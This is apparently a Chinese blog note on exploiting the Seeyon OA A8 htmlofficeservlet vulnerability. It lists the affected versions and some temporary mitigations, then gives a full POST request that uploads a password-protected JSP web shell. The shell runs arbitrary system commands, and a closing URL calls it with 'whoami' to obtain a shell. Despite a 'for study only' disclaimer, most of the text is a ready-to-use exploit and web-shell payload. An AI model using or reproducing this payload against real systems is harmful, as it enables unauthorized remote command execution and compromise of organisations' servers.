最近正好有人問,於是乎翻翻筆記發一波
環境為本地復現學習!文章僅供學習交流使用!用於非法目的與本人無關!
漏洞影響
漏洞影響的產品版本包括:
致遠A8-V5協同管理軟件 V6.1sp1
致遠A8+協同管理軟件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致遠A8+協同管理軟件V7.1
漏洞修補
臨時修補方案如下:
1、 配置URL訪問控制策略;
2、 在公網部署的致遠A8+服務器,通過ACL禁止外網對“/seeyon/htmlofficeservlet”路徑的訪問;
3、 對OA服務器上的網站后門文件進行及時查殺。
建議使用致遠OA-A8系統的信息系統運營者進行自查,發現存在漏洞后,按照以上方案及時修復。
利用姿勢發送如下POST包
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: XXX
Content-Length: 1251
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Pragma: no-cache
Content-Length: 1122
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%@if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
瀏覽器訪問即可getshell
http://XXX/seeyon/test123456.jsp?pwd=asasd3344&cmd=whoami
截圖
